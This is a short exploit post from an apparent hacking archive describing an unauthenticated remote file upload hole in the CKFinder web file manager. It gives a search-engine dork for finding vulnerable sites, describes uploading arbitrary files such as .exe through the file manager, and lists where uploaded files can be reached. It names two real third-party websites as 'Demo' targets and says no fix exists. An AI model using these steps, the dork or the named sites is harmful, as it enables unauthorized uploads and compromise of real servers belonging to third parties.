Ckfinder remote file Upload Vulnerability

2010-10-02 20:04:26
Posted by: Net.Edit0r

==========================================
Ckfinder remote file Upload Vulnerability
==========================================


#Exploit Title: Ckfinder remote file Upload Vulnerability

#Author: Net.Edit0r

#Dork : inurl:"/ckfinder/ckfinder.html"


#Software Link: http://www.ckfinder.com/

#Platform :linux/php

#Exploit : http://target.com

#http://target.com/[path]/ckfinder/ckfinder.html

#Select the "Upload" To use = txt . xml . exe . mp3 . and ..

#http://target.com/[path]/ckfinder/ckfinder.html

#File : http://target.com/[path]/ckfinder/userfiles/files/Name File

#OR

#http://target.com/[path]/ckfinder/files/Name File

Demo : http://www.tenants.bc.ca/ckfinder/ckfinder.html

Demo : http://www.strichacht.at/libs/ckfinder/ckfinder.html

########################################### Iranian HackerZ ##############################################
#
#
# Spical Thanks To : Darkcoder ~ H-SK33PY ~ S3Ri0uS ~ b3hz4d ~ Classic ~ AmIr-MaGic
#
#
# Greetz : Ashiyane.Org ~ Datacoders.Org ~ Houseofhackers.Net #Ibh
#
##########################################################################################################

Fixes

No fixes

In order to submit a new fix you need to be registered.